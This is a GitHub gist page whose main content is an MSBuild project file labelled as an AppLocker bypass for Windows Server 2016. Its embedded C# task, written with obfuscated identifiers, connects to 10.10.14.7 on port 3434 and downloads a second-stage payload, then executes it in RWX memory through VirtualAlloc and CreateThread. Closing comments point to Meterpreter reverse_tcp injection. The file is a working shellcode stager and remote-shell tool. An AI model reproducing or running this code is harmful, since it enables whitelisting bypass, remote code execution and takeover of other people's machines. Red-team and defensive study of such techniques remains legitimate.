Last active
February 6, 2019 02:34
-
-
Save dualfade/78df813bfb5f6f19f12e37eb7db52c68 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Applocker bypass - Windows 2016 (Build 14393) x64 | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
| //Microsoft (R) Build Engine version 4.6.1586.0 | |
| //[Microsoft .NET Framework, version 4.0.30319.42000] | |
| //Copyright (C) Microsoft Corporation. All rights reserved. | |
| //Build started 2/5/2019 8:55:26 PM. | |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <Target Name="TGaywVtZz"> | |
| <yymnTWKasHV /> | |
| </Target> | |
| <UsingTask | |
| TaskName="yymnTWKasHV" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> | |
| <![CDATA[ | |
| using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; | |
| public class yymnTWKasHV : Task, ITask { | |
| [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 FZzLxk,UInt32 GaYMcefbEK, UInt32 GFGltjlHN, UInt32 rUfXcRhhWyT); | |
| [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 EEKWyVg, UInt32 DCQjzDiQ, UInt32 yUAshCNzdWWyiuX,IntPtr qcoQmEAsCYVxJN, UInt32 cwTzTaaIonmPyx, ref UInt32 NIQSzWsYXEXJ); | |
| [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr ghbDXrzbbkU, UInt32 JRLCRpITaqhthxo); | |
| static byte[] XLiKrUiHVLg(string MWGKqRcvxKiCxsD, int WfkhTLYBl) { | |
| IPEndPoint AljjdKQhXFar = new IPEndPoint(IPAddress.Parse(MWGKqRcvxKiCxsD), WfkhTLYBl); | |
| Socket AOjJkaknaCLabUb = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); | |
| try { AOjJkaknaCLabUb.Connect(AljjdKQhXFar); } | |
| catch { return null;} | |
| byte[] mdoldF = new byte[4]; | |
| AOjJkaknaCLabUb.Receive(mdoldF, 4, 0); | |
| int MgAnjUozvMDSsv = BitConverter.ToInt32(mdoldF, 0); | |
| byte[] KCEwzCyVtln = new byte[MgAnjUozvMDSsv + 5]; | |
| int fjlRsQatOOXVF = 0; | |
| while (fjlRsQatOOXVF < MgAnjUozvMDSsv) | |
| { fjlRsQatOOXVF += AOjJkaknaCLabUb.Receive(KCEwzCyVtln, fjlRsQatOOXVF + 5, (MgAnjUozvMDSsv - fjlRsQatOOXVF) < 4096 ? (MgAnjUozvMDSsv - fjlRsQatOOXVF) : 4096, 0);} | |
| byte[] HUDMCDCGhunIblU = BitConverter.GetBytes((int)AOjJkaknaCLabUb.Handle); | |
| Array.Copy(HUDMCDCGhunIblU, 0, KCEwzCyVtln, 1, 4); KCEwzCyVtln[0] = 0xBF; | |
| return KCEwzCyVtln;} | |
| static void xxtKMgGJV(byte[] jLKRseom) { | |
| if (jLKRseom != null) { | |
| UInt32 XewKEzI = VirtualAlloc(0, (UInt32)jLKRseom.Length, 0x1000, 0x40); | |
| Marshal.Copy(jLKRseom, 0, (IntPtr)(XewKEzI), jLKRseom.Length); | |
| IntPtr FGAnYqQsIBfSRGz = IntPtr.Zero; | |
| UInt32 APoDWpuRSVvZO = 0; | |
| IntPtr GHFmTAQDl = IntPtr.Zero; | |
| FGAnYqQsIBfSRGz = CreateThread(0, 0, XewKEzI, GHFmTAQDl, 0, ref APoDWpuRSVvZO); | |
| WaitForSingleObject(FGAnYqQsIBfSRGz, 0xFFFFFFFF); }} | |
| public override bool Execute() | |
| { | |
| byte[] vKluxGThzSA = null; vKluxGThzSA = XLiKrUiHVLg("10.10.14.7", 3434); | |
| xxtKMgGJV(vKluxGThzSA); | |
| return true; } } | |
| ]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| </Project> | |
| // Migrate -> x64 | |
| // use windows/local/payload_inject | |
| // set payload windows/x64/meterpreter/reverse_tcp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment